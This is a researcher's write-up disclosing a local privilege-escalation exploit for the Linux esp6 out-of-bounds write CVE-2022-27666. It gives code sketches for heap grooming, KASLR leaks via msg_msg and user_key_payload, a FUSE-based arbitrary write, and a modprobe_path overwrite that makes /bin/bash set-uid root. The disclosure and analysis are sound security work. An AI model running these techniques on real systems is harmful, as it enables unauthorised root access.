CVE-2022-27666: Exploit esp6 modules in Linux kernel
2022-03-29 02:20:46 | Author: etenal.me

03/28/2022

This post discloses the exploit of CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10. We were initially saving it for Pwn2Own 2022, but it got patched two months before the contest, and thus we decided to disclose our exploit.

Our preliminary experiments show this vulnerability affects the latest Ubuntu, Fedora, and Debian. Our exploit was built to attack Ubuntu Desktop 21.10 (the latest version at the time I was writing the exploit).

The exploit achieves around 90% reliability on a freshly installed Ubuntu Desktop 21.10 (VMware’s default setup: 4 GB memory, 2 CPUs); we managed to come up with some novel heap-stabilization tricks to mitigate kernel heap noise. As for the exploit technique, it was my first time doing page-level heap fengshui and a cross-cache overflow, and I chose msg_msg’s arbitrary read & write to leak the KASLR offset and escalate privileges. I learned a lot while writing this exploit and hope you have fun reading about it.

Root Cause

CVE-2022-27666 is a vulnerability in the Linux esp6 crypto module. It was introduced in 2017 by commit cac2661c53f3 and commit 03e2a30f6a27. The basic logic of the vulnerability is that the receiving buffer of a user message in the esp6 module is an 8-page buffer, but the sender can send a message larger than 8 pages, which clearly creates a buffer overflow.

esp6_output_head is in charge of allocating the receiving buffer. The allocsize is not what matters here: skb_page_frag_refill by default allocates an 8-page contiguous buffer.

int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *esp)
{
        ...
        int tailen = esp->tailen;
        allocsize = ALIGN(tailen, L1_CACHE_BYTES);

        spin_lock_bh(&x->lock);

        if (unlikely(!skb_page_frag_refill(allocsize, pfrag, GFP_ATOMIC))) {
        	spin_unlock_bh(&x->lock);
	        goto cow;
        }
        ...
}

bool skb_page_frag_refill(unsigned int sz, struct page_frag *pfrag, gfp_t gfp)
{
        if (pfrag->offset + sz <= pfrag->size)
		return true;
	...
	if (SKB_FRAG_PAGE_ORDER &&
	    !static_branch_unlikely(&net_high_order_alloc_disable_key)) {

		pfrag->page = alloc_pages((gfp & ~__GFP_DIRECT_RECLAIM) |
					  __GFP_COMP | __GFP_NOWARN |
					  __GFP_NORETRY,
					  SKB_FRAG_PAGE_ORDER);
		...
	}
	...
	return false;
}

skb_page_frag_refill allocates order-3 pages, i.e., an 8-page contiguous buffer. Therefore, the maximum size of the receiving buffer is 8 pages, while the incoming data can be larger than 8 pages, so a buffer overflow occurs in null_skcipher_crypt. In this function, the memcpy copies N pages of data into the 8-page buffer, which clearly causes an out-of-bounds write.

static int null_skcipher_crypt(struct skcipher_request *req)
{
	struct skcipher_walk walk;
	int err;

	err = skcipher_walk_virt(&walk, req, false);

	while (walk.nbytes) {
		if (walk.src.virt.addr != walk.dst.virt.addr)
			// out-of-bounds write
			memcpy(walk.dst.virt.addr, walk.src.virt.addr,
			       walk.nbytes);
		err = skcipher_walk_done(&walk, 0);
	}

	return err;
}

Now, let’s look at the patch that fixes this vulnerability. ESP_SKB_FRAG_MAXSIZE is 32768, equal to 8 pages. If allocsz is bigger than 8 pages, the code falls back to the COW path.

diff --git a/include/net/esp.h b/include/net/esp.h
index 9c5637d41d951..90cd02ff77ef6 100644
--- a/include/net/esp.h
+++ b/include/net/esp.h
@@ -4,6 +4,8 @@
 
 #include <linux/skbuff.h>
 
+#define ESP_SKB_FRAG_MAXSIZE (PAGE_SIZE << SKB_FRAG_PAGE_ORDER)
+
 struct ip_esp_hdr;
 
 static inline struct ip_esp_hdr *ip_esp_hdr(const struct sk_buff *skb)
diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
index e1b1d080e908d..70e6c87fbe3df 100644
--- a/net/ipv4/esp4.c
+++ b/net/ipv4/esp4.c
@@ -446,6 +446,7 @@ int esp_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *
 	struct page *page;
 	struct sk_buff *trailer;
 	int tailen = esp->tailen;
+	unsigned int allocsz;
 
 	/* this is non-NULL only with TCP/UDP Encapsulation */
 	if (x->encap) {
@@ -455,6 +456,10 @@ int esp_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *
 			return err;
 	}
 
+	allocsz = ALIGN(skb->data_len + tailen, L1_CACHE_BYTES);
+	if (allocsz > ESP_SKB_FRAG_MAXSIZE)
+		goto cow;
+
 	if (!skb_cloned(skb)) {
 		if (tailen <= skb_tailroom(skb)) {
 			nfrags = 1;
diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
index 7591160edce14..b0ffbcd5432d6 100644
--- a/net/ipv6/esp6.c
+++ b/net/ipv6/esp6.c
@@ -482,6 +482,7 @@ int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info
 	struct page *page;
 	struct sk_buff *trailer;
 	int tailen = esp->tailen;
+	unsigned int allocsz;
 
 	if (x->encap) {
 		int err = esp6_output_encap(x, skb, esp);
@@ -490,6 +491,10 @@ int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info
 			return err;
 	}
 
+	allocsz = ALIGN(skb->data_len + tailen, L1_CACHE_BYTES);
+	if (allocsz > ESP_SKB_FRAG_MAXSIZE)
+		goto cow;
+
 	if (!skb_cloned(skb)) {
 		if (tailen <= skb_tailroom(skb)) {
 			nfrags = 1;

Exploitability

In our preliminary experiment, we managed to send 16 pages of data, which means we create an 8-page overflow in kernel space; that is more than enough for a generic OOB write. One thing worth mentioning is that esp6 appends several bytes to the tail in the function esp_output_fill_trailer. These bytes are calculated from the length of the incoming message and the protocol we are using.

static inline void esp_output_fill_trailer(u8 *tail, int tfclen, int plen, __u8 proto)
{
	/* Fill padding... */
	if (tfclen) {
		memset(tail, 0, tfclen);
		tail += tfclen;
	}
	do {
		int i;
		for (i = 0; i < plen - 2; i++)
			tail[i] = i + 1;
	} while (0);
	tail[plen - 2] = plen - 2;
	tail[plen - 1] = proto;
}

The tail calculation is shown above: the values are strictly bound to the length and the protocol. For example, with plen = 4 the trailer bytes are 01 02 02 followed by the protocol number. We cannot make them arbitrary values, and therefore we treat the tail bytes as garbage data.

Page-level heap fengshui

Unlike any other exploit I had developed before, this vulnerability requires page-level heap fengshui. Remember that the OOB write starts from an 8-page contiguous buffer, which means the overflow hits the adjacent pages. Back when I started writing the exploit, I had no experience dealing with the page allocator, so I literally went through the entire page_alloc.c and learned the underlying mechanisms that helped me develop this exploit.

Page allocator

The Linux page allocator[2], a.k.a. the buddy allocator, manages physical pages in the Linux kernel. It provides the lower-level memory management behind allocators such as SLUB, SLAB, and SLOB. One simple example: when the kernel consumes all slabs of kmalloc-4k, the slab allocator requests a new slab from the page allocator; since kmalloc-4k has an 8-page (order-3) slab, it asks the page allocator for 8 pages of memory.

The page allocator tracks free pages in a data structure called free_area, an array in which each entry keeps page blocks of one order (the term used to differentiate page-block sizes). The size of an order-N block is PAGE_SIZE << N: an order-0 block is 1 page (PAGE_SIZE << 0), an order-1 block is 2 pages (PAGE_SIZE << 1), ..., and an order-3 block is 8 pages (PAGE_SIZE << 3). For each order, free_area maintains a free_list; pages are allocated from the free_list and freed back to it.
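
For reference, the relevant definitions look roughly like this (simplified from include/linux/mmzone.h; fields irrelevant to this discussion are omitted):

/* Each zone keeps one free_area per order, and each free_area keeps
 * per-migratetype lists of free page blocks of that order. */
struct free_area {
	struct list_head	free_list[MIGRATE_TYPES];
	unsigned long		nr_free;
};

struct zone {
	/* ... */
	/* free_area[0] holds order-0 (single-page) blocks,
	 * free_area[3] holds order-3 (8-page) blocks, and so on */
	struct free_area	free_area[MAX_ORDER];
	/* ... */
};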

Different slab caches request different orders of pages when they run out of slabs. For example, on Ubuntu 21.10, kmalloc-256 requests order-0 pages, kmalloc-512 requests order-1 pages, and kmalloc-4k requests order-3 pages.

If there are no free pages in a given order’s free_list, that order borrows a block from a higher-order free_area. The higher-order block splits into two halves: the lower-address half goes to the source of the page request (usually alloc_pages()), and the higher-address half goes onto the lower order’s free_list. For example, when order-2 (4-page) blocks are all consumed, the allocator takes an order-3 (8-page) block and splits it in two: the lower-address 4 pages are handed to the object that requested them, and the higher-address 4 pages are placed on order-2’s free_list, so the next order-2 request can be served directly from there.

Figure 1: higher order split up to lower order

When pages are freed back to a free_list, the page allocator tries to merge two physically adjacent blocks of the same order into a higher order. Take the same example as above: an order-3 block got split into two order-2 blocks, one of which was allocated while the other stayed on order-2’s free_list. Once the allocated block is freed back to order-2’s free_list, the page allocator checks whether the newly freed block’s same-order neighbor (its ‘buddy’) is also free; if so, the two are merged back into an order-3 block.
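
Finding the buddy is cheap: it is the block whose page frame number differs only in bit `order`, as computed by this helper from mm/internal.h:

/* A block's buddy is the other half of the order+1 block they came from,
 * i.e. the block whose PFN differs only in bit `order`. */
static inline unsigned long
__find_buddy_pfn(unsigned long page_pfn, unsigned int order)
{
	return page_pfn ^ (1 << order);
}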

Figure 2: Lower-order merged into higher-order

The following code snippet shows how the page allocator picks a page block from free_area and how it falls back to a higher order when the requested order is empty.

static __always_inline
struct page *__rmqueue_smallest(struct zone *zone, unsigned int order,
						int migratetype)
{
	unsigned int current_order;
	struct free_area *area;
	struct page *page;


	for (current_order = order; current_order < MAX_ORDER; ++current_order) {
		// Pick up the right order from free_area
		area = &(zone->free_area[current_order]);
		// Get the page from the free_list
		page = get_page_from_free_area(area, migratetype);
		// If no freed page in free_list, goes to high order to retrieve
		if (!page)
			continue;
		del_page_from_free_list(page, zone, current_order);
		expand(zone, page, order, current_order, migratetype);
		set_pcppage_migratetype(page, migratetype);
		return page;
	}

	return NULL;
}

static inline struct page *get_page_from_free_area(struct free_area *area,
					    int migratetype)
{
	return list_first_entry_or_null(&area->free_list[migratetype],
					struct page, lru);
}

Shaping Heap[3]

Now let’s talk about how to arrange the heap layout for the OOB write. As we already know, the page allocator keeps a free_list for each order in free_area. Pages come and go in a free_list, and there is no guarantee that two page blocks in the same free_list are contiguous; even if we allocate the same order of pages consecutively, they might still be far away from each other. To shape the heap correctly, we have to make sure the blocks we receive are contiguous. To do so, we drain the free_list of the target order and force it to borrow page blocks from a higher order. Once it borrows from a higher order, two consecutive allocations will split the higher-order block, and most importantly, that higher-order block is one chunk of contiguous memory.
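
As a concrete but hedged illustration (the object, size, and count below are my choices for the sketch, not necessarily the exploit’s exact values): System V messages of roughly 4 KB are backed by kmalloc-4k msg_msg objects, and kmalloc-4k uses order-3 slabs on Ubuntu 21.10, so spraying enough of them drains order-3’s free_list and forces splits of higher-order blocks.

#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define SPRAY_SIZE  4000   /* msg_msg header + 4000 bytes fits in one kmalloc-4k object */
#define SPRAY_COUNT 2048   /* illustrative: enough to exhaust order-3's free_list */

struct spray_msg {
	long mtype;
	char mtext[SPRAY_SIZE];
};

/* Drain order-3 by forcing kmalloc-4k to request fresh order-3 slabs. */
int drain_order3(void)
{
	struct spray_msg msg = { .mtype = 1 };
	memset(msg.mtext, 'A', sizeof(msg.mtext));

	for (int i = 0; i < SPRAY_COUNT; i++) {
		int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
		if (qid < 0 || msgsnd(qid, &msg, sizeof(msg.mtext), IPC_NOWAIT) < 0)
			return -1;
	}
	return 0;
}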

Mitigating noise

One challenge of shaping the heap is mitigating noise. Some kernel daemon processes constantly allocate and free pages back and forth: lower-order pages merge into higher orders, and higher-order pages split to fulfill lower-order requests, which creates tons of noise while doing heap grooming. In our case, we do heap grooming with order-3 pages, but order 2 keeps requesting and splitting order-3 blocks, or order-2 blocks get merged back into order-3’s free_list.

To mitigate this noise, I do the following:

  1. Drain the freelists of order 0, 1, and 2.
  2. Allocate tons of order-2 objects (say N of them); by doing so, order 2 borrows pages from order 3.
  3. Free every other object from step 2 and keep the rest. This returns N/2 blocks to order-2’s freelist.
  4. Free all objects from step 1.

In step 3, we don’t want to free all of them, because they would go back to order 3 as soon as their adjacent blocks show up in order-2’s free_list. Freeing every other block keeps the freed halves in order-2’s free_list forever. This method leaves N/2 extra blocks in order-2’s free_list and thus prevents order 2 from borrowing pages from, or merging pages back into, order 3. This strategy protects our heap grooming.

Figure 3: This animation shows the noise mitigation strategy
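
A sketch of this strategy in code, where alloc_order2_block() and free_order2_block() are hypothetical placeholders for whatever userspace primitive ends up consuming or releasing one order-2 (4-page) block:

/* Hypothetical primitives: however the exploit actually consumes and
 * releases one order-2 (4-page) block from userspace. */
extern void *alloc_order2_block(void);
extern void  free_order2_block(void *blk);

#define STABILIZE_COUNT 512	/* illustrative */

void stabilize_order2(void)
{
	static void *hold[STABILIZE_COUNT];

	/* step 2: order 2 has to borrow (and split) order-3 blocks */
	for (int i = 0; i < STABILIZE_COUNT; i++)
		hold[i] = alloc_order2_block();

	/* step 3: free every other block; the kept blocks pin their buddies,
	 * so the freed halves stay on order-2's free_list and never merge
	 * back into order 3 */
	for (int i = 0; i < STABILIZE_COUNT; i += 2)
		free_order2_block(hold[i]);
}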

Leaking KASLR offset

Candidate 1: struct msg_msg

The first step of the exploit is to leak the KASLR offset. One simple idea that came to my mind is using struct msg_msg to create an arbitrary read. The basic idea of this approach is overwriting the m_ts field in struct msg_msg, which changes the recorded length of the message; m_ts controls how much data is read through the segment (struct msg_msgseg) pointed to by the next pointer. By enlarging m_ts, we can read out of bounds through the next pointer.

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

While testing, I realized the garbage bytes appended to the tail completely break this approach. When we overwrite the m_ts field, the garbage bytes also overwrite a few bytes of the next pointer. Since next is corrupted, the out-of-bounds read makes no sense (the OOB read happens at the address pointed to by this next pointer).

Figure 4: Garbage data corrupts pointer

Candidate 2: struct user_key_payload

I was stuck at this phase for a while; I needed to find some other structure that doesn’t have a critical field right behind the field I plan to overwrite, otherwise the garbage data would corrupt it. I read a few papers[6] to gain some insight, and eventually I found that a structure called user_key_payload fits all my requirements.

struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */
	unsigned short	datalen;	/* length of this data */
	char		data[] __aligned(__alignof__(u64)); /* actual data */
};

The rcu pointer can safely be set to NULL, datalen is the length field we plan to overwrite, and the garbage data only corrupts several bytes in data[], which is fine since they are just data.
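
As a hedged sketch (the key descriptions, size, and counts below are illustrative, not the exploit’s exact values), spraying and reading these keys from an unprivileged process looks roughly like this:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/keyctl.h>

#define KEY_PAYLOAD_SZ 2600   /* > 2048, so user_key_payload lands in kmalloc-4k */

/* Allocate one user_key_payload in kmalloc-4k. */
long spray_key(int idx)
{
	char desc[32], payload[KEY_PAYLOAD_SZ];

	snprintf(desc, sizeof(desc), "spray_%d", idx);
	memset(payload, 'K', sizeof(payload));
	return syscall(__NR_add_key, "user", desc, payload, sizeof(payload),
		       KEY_SPEC_PROCESS_KEYRING);
}

/* Once datalen has been enlarged by the OOB write, the same read returns
 * out-of-bounds data following the key's payload. */
long read_key(long key_id, void *buf, size_t len)
{
	return syscall(__NR_keyctl, KEYCTL_READ, key_id, buf, len);
}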

One realistic constraint of this structure is that normal users on Ubuntu have a per-user hard limit on how many keys they can own and how many bytes of payload they can allocate in total. Ubuntu allows a normal user a maximum of 200 keys and 20000 bytes of payload in total (see /proc/sys/kernel/keys/maxkeys and /proc/sys/kernel/keys/maxbytes).

This limitation makes the exploit a little bit tricky. Let’s take a look at the preliminary heap layout again. The vulnerable buffer overflows into the adjacent memory (the victim SLAB in the picture). In order to place a valid slab in this victim memory, the slab size must be 8 pages. On Ubuntu, only kmalloc-2k, kmalloc-4k, and kmalloc-8k have order-3 slabs.

I decided to fill the victim SLAB with kmalloc-4k objects, so the minimal size of a user_key_payload is 2049 bytes (it rounds up to 4k). For kmalloc-4k, each slab has 8 objects. To fill a whole slab with user_key_payload, we have to consume 2049*8 = 16392 bytes. Remember we have only 20000 bytes in total, so only one more user_key_payload is left ((20000-16392)/2049 = 1). To conclude, we have two slabs for heap fengshui, which gives us very weak fault tolerance: any noise could break our fengshui.

Figure 5: Weak fault tolerance SLAB layout

To mitigate this problem, I chose a one-user_key_payload-per-slab approach: I allocate only one user_key_payload in each slab and fill the rest of the slab with other objects. The user_key_payload’s position within the slab can be arbitrary due to freelist randomization, which is fine in our case: the out-of-bounds write can overwrite the entire slab (8 pages), which will eventually cover the user_key_payload object. With this approach, I can create 9 slabs instead of 2 for the heap fengshui, and it succeeds as long as one slab is in the right place.

Figure 6: Strong fault tolerance SLAB layout

What to read?

Now that we have the user_key_payload in place, let’s think about which kernel object we plan to leak. The simplest way is to put an object with a function pointer next to the user_key_payload; we then leak the KASLR offset by calculating the difference between the leaked function pointer and its address in the symbol file. However, I really wanted to demonstrate the arbitrary read & write techniques from this amazing post[1], and that’s why I chose to leak a correct next pointer of a struct msg_msg.

If I have a correct next pointer, then later I can overwrite m_ts and replace the next pointer without worrying about corrupting anything (the security pointer will be corrupted when overwriting next, but the security pointer has no use on Ubuntu and is always zero).

Phase 1: Leak a correct next pointer from struct msg_msg

The heap layout is shown in the picture below. The black arrow represents the OOB write, the orange arrow the OOB read. First, we use the initial OOB write to overwrite the datalen of a struct user_key_payload; we then achieve an OOB read by reading back the payload of the corrupted struct user_key_payload. Our target is the next pointer of a struct msg_msg.

Since we will use this next pointer for the KASLR leak later, we have to prepare tons of struct seq_operations alongside the struct msg_msgseg objects. Both structures should fall into kmalloc-32, and this puts a constraint on the message size: 4056 to 4072 bytes. Only 4096 - 48 bytes (48 is the msg_msg header) go into the main message body; the rest goes into the linked list maintained by the next pointer. To make sure next points into kmalloc-32, the data in struct msg_msgseg cannot exceed 32 - 8 bytes (8 is the msg_msgseg header) and cannot be less than 16 - 8 bytes (otherwise it goes to kmalloc-16). If you still cannot understand this, check out this post.

Figure 7: High-level heap layout for leaking next pointer
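
As a hedged sketch of the two sprays (counts are illustrative): opening /proc/self/stat is a common way to allocate a struct seq_operations in kmalloc-32 via single_open(), and a message in the size range above leaves its last few bytes in a kmalloc-32 msg_msgseg.

#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define SEG_MSG_SIZE 4064   /* 4048 bytes fill the msg_msg; the remainder
                             * goes into a kmalloc-32 msg_msgseg */

struct seg_msg {
	long mtype;
	char mtext[SEG_MSG_SIZE];
};

void spray_kmalloc32(int nr_seq_ops, int nr_msgs)
{
	/* each open() makes single_open() allocate one struct seq_operations */
	for (int i = 0; i < nr_seq_ops; i++)
		open("/proc/self/stat", O_RDONLY);

	/* each message allocates a kmalloc-4k msg_msg plus a kmalloc-32 msg_msgseg */
	struct seg_msg m = { .mtype = 1 };
	memset(m.mtext, 'B', sizeof(m.mtext));
	for (int i = 0; i < nr_msgs; i++) {
		int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
		msgsnd(qid, &m, sizeof(m.mtext), IPC_NOWAIT);
	}
}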

To increase the success rate and mitigate noise, we create 9 pairs of this heap layout (9 is the largest number of user_key_payload objects I can allocate within kmalloc-4k); as long as one pair succeeds, we get a correct next pointer of a struct msg_msg.

Figure 8: A fine-grained explanation about our heap fengshui

Phase 2: Leak KASLR offset

Once we have the correct next pointer, we enter phase 2 and build another heap layout to leak the KASLR offset. struct seq_operations is a good candidate. We use the initial OOB write to overwrite m_ts (the length of the message) and the next pointer (the address of the message body), so reading the message back returns the function pointers of a struct seq_operations.

Figure 9: The black arrow represents OOB write, the orange arrow represents OOB read
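
The read-back itself is not shown in the figure; one common way (used, e.g., in [1]) is msgrcv() with MSG_COPY, which copies the message without dequeueing or freeing it. A minimal sketch, assuming the queue id and the enlarged m_ts are known:

#include <sys/ipc.h>
#include <sys/msg.h>

#ifndef MSG_COPY
#define MSG_COPY 040000   /* needs CONFIG_CHECKPOINT_RESTORE, enabled on Ubuntu */
#endif

/* Peek at message #index of the queue: with MSG_COPY the kernel copies up to
 * m_ts bytes of message data back to userspace without removing the message;
 * the bytes beyond the inline part come from wherever the overwritten next
 * pointer points. buf must begin with a long mtype field followed by enough
 * room for the copied data. */
long leak_read(int qid, int index, void *buf, size_t fake_m_ts)
{
	return msgrcv(qid, buf, fake_m_ts, index, MSG_COPY | IPC_NOWAIT);
}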

So my leaking steps are:

Phase 1

  1. Allocate tons of 8-page buffers to drain order-3’s free_list. Order 3 then borrows pages from higher orders, which makes the new blocks contiguous.
  2. Allocate three contiguous 8-page dummy objects.
  3. Free the second dummy object, then allocate an 8-page slab that contains 1 struct user_key_payload and 7 other objects.
  4. Free the third dummy object, then allocate an 8-page slab that is full of struct msg_msg. The message size must be in the range 4056 to 4072 so that the struct msg_msgseg falls into kmalloc-32.
  5. Allocate tons of struct seq_operations. These structures land in the same slabs as the struct msg_msgseg objects from step 4.
  6. Free the first dummy object, allocate the vulnerable buffer, and start the out-of-bounds write; we aim to modify the datalen field of a struct user_key_payload.
  7. If step 6 succeeds, retrieving the payload of this user_key_payload leads to an out-of-bounds read. This OOB read reveals the content of a struct msg_msg, including its next pointer.
  8. If step 7 succeeds, we now have a correct next pointer of a struct msg_msg object.

Phase 2

  1. Allocate two contiguous 8-page dummy objects.
  2. Free the second dummy object, then allocate a slab full of struct msg_msg.
  3. Free the first dummy object, allocate the vulnerable buffer, overwrite the m_ts field with a bigger value, and overwrite the next pointer with the one we got from Phase 1 step 7.
  4. If step 3 succeeds, we have an OOB read on kmalloc-32 memory. It is very likely that we will read a function pointer from one of the struct seq_operations allocated in Phase 1 step 5; from that we calculate the KASLR offset.

Get Root

Once we have leaked the KASLR offset, msg_msg’s arbitrary write becomes a valid option. The idea of this technique[1] is to pause the first copy_from_user in load_msg while it is copying user data, change the next pointer while it is blocked (in the loop below, seg comes from msg->next), and then resume the process so that the second copy_from_user becomes an arbitrary write.

struct msg_msg *load_msg(const void __user *src, size_t len)
{

	...
	// hang the process at the first copy_from_user
	// modify the msg->next and resume the process
	if (copy_from_user(msg + 1, src, alen))
		goto out_err;

	// msg->next has been changed to an arbitrary memory
	for (seg = msg->next; seg != NULL; seg = seg->next) {
		len -= alen;
		src = (char __user *)src + alen;
		alen = min(len, DATALEN_SEG);

		// Now an arbitrary write happens
		if (copy_from_user(seg + 1, src, alen))
			goto out_err;
	}

	...
}

If you are familiar with userfaultfd, you might know the technique of using userfaultfd to pause a process; I posted a blog about it around two years ago. Unfortunately, since kernel v5.11 a normal user needs a specific capability to use userfaultfd. But now we have another technique to do the same thing: thanks to Jann[4] for sharing the idea of using FUSE[5]. FUSE is a framework for implementing filesystems in userspace; we can create our own filesystem and map memory backed by it, and every read and write that goes through that memory is handled by our own filesystem. Therefore, we can simply block the process in our custom read handler (copy_from_user reads data from userspace) and release it once the next pointer has been changed.

Figure 10: Demonstrate how abusing FUSE achieves the arb write
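
Here is a minimal sketch of the FUSE side using the libfuse (version 3) high-level API; the getattr/open stubs, the semaphore handshake, and all names are illustrative rather than the exploit’s actual code. The exploit mmap()s a file on this mount and passes that mapping to msgsnd(); when copy_from_user faults on the not-yet-populated page, the kernel issues a FUSE read request and the faulting thread blocks in our handler until we post the semaphore.

#define FUSE_USE_VERSION 31
#include <fuse.h>
#include <semaphore.h>
#include <string.h>
#include <sys/stat.h>

static sem_t resume_sem;       /* posted once msg_msg->next has been overwritten */
static char payload[0x1000];   /* what copy_from_user will see when we resume */

static int hang_getattr(const char *path, struct stat *st,
			struct fuse_file_info *fi)
{
	(void)path; (void)fi;
	memset(st, 0, sizeof(*st));
	st->st_mode = S_IFREG | 0666;
	st->st_size = sizeof(payload);
	return 0;
}

static int hang_open(const char *path, struct fuse_file_info *fi)
{
	(void)path; (void)fi;
	return 0;
}

static int hang_read(const char *path, char *buf, size_t size, off_t off,
		     struct fuse_file_info *fi)
{
	(void)path; (void)off; (void)fi;
	/* The kernel thread doing copy_from_user() is stuck here until the
	 * exploit thread posts the semaphore after corrupting msg_msg->next. */
	sem_wait(&resume_sem);
	if (size > sizeof(payload))
		size = sizeof(payload);
	memcpy(buf, payload, size);
	return size;
}

static const struct fuse_operations hang_ops = {
	.getattr = hang_getattr,
	.open    = hang_open,
	.read    = hang_read,
};

/* Mount with fuse_main(argc, argv, &hang_ops, NULL), then mmap() a file on
 * this mount and hand that mapping to msgsnd(). */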

By utilizing the arbitrary write, we overwrite the path of modprobe. modprobe is a userspace program that loads kernel modules: every time the kernel needs to load a module, it does an upcall to userspace and runs modprobe as root to load the target module. The location of modprobe is hard-coded into the kernel and stored in a global variable, modprobe_path.

Figure 11: Use arb write to overwrite modprobe_path

My exploit changes modprobe_path to my own program /tmp/get_rooot, which runs chmod u+s /bin/bash. When the kernel runs /tmp/get_rooot as root, it changes the permissions of /bin/bash, and anyone who then runs bash runs it with root privileges.
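
Setting up the helper is trivial; a hedged sketch (same path as above, a one-line shell script is all it needs):

#include <fcntl.h>
#include <unistd.h>

/* Drop the helper that modprobe_path now points to: when the kernel runs it
 * as root, it makes /bin/bash set-uid root. */
void write_get_rooot(void)
{
	const char script[] = "#!/bin/sh\nchmod u+s /bin/bash\n";
	int fd = open("/tmp/get_rooot", O_WRONLY | O_CREAT | O_TRUNC, 0755);

	write(fd, script, sizeof(script) - 1);
	close(fd);
}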

My steps to get a root shell:

  1. Allocate two contiguous 8-page dummy objects.
  2. Map the message content onto FUSE, free the second dummy object, and allocate an 8-page slab full of struct msg_msg. The spraying threads hang in this step.
  3. Free the first dummy object, allocate the vulnerable object, and replace the next pointer of an adjacent struct msg_msg with the address of modprobe_path.
  4. Release the threads hanging in step 2; the string "/tmp/get_rooot" is copied to modprobe_path.
  5. Trigger modprobe by executing a file with an unknown format (see the sketch after this list).
  6. Run /bin/bash; we are root now.
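
And a hedged sketch of step 5 (file name and magic bytes are illustrative):

#include <fcntl.h>
#include <unistd.h>

/* Executing a file whose magic bytes match no registered binfmt makes the
 * kernel call request_module(), which runs modprobe_path (now
 * "/tmp/get_rooot") as root. */
void trigger_modprobe(void)
{
	char *argv[] = { "/tmp/dummy", NULL };
	char *envp[] = { NULL };

	int fd = open("/tmp/dummy", O_WRONLY | O_CREAT | O_TRUNC, 0755);
	write(fd, "\xff\xff\xff\xff", 4);
	close(fd);

	execve("/tmp/dummy", argv, envp);  /* fails (unknown format), but the upcall fires */
	/* step 6: /bin/bash is now set-uid root; run `/bin/bash -p` for a root shell */
}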

The exploit is available on my GitHub.

Reference

[1] https://www.willsroot.io/2022/01/cve-2022-0185.html
[2] https://www.kernel.org/doc/gorman/html/understand/understand009.html
[3] https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
[4] https://bugs.chromium.org/p/project-zero/issues/detail?id=808
[5] https://github.com/nrb547/kernel-exploitation/blob/main/cve-2021-32606/cve-2021-32606.md
[6] https://zplin.me/papers/ELOISE.pdf

Special thanks to Norbert Slusarek and Zhiyun Qian

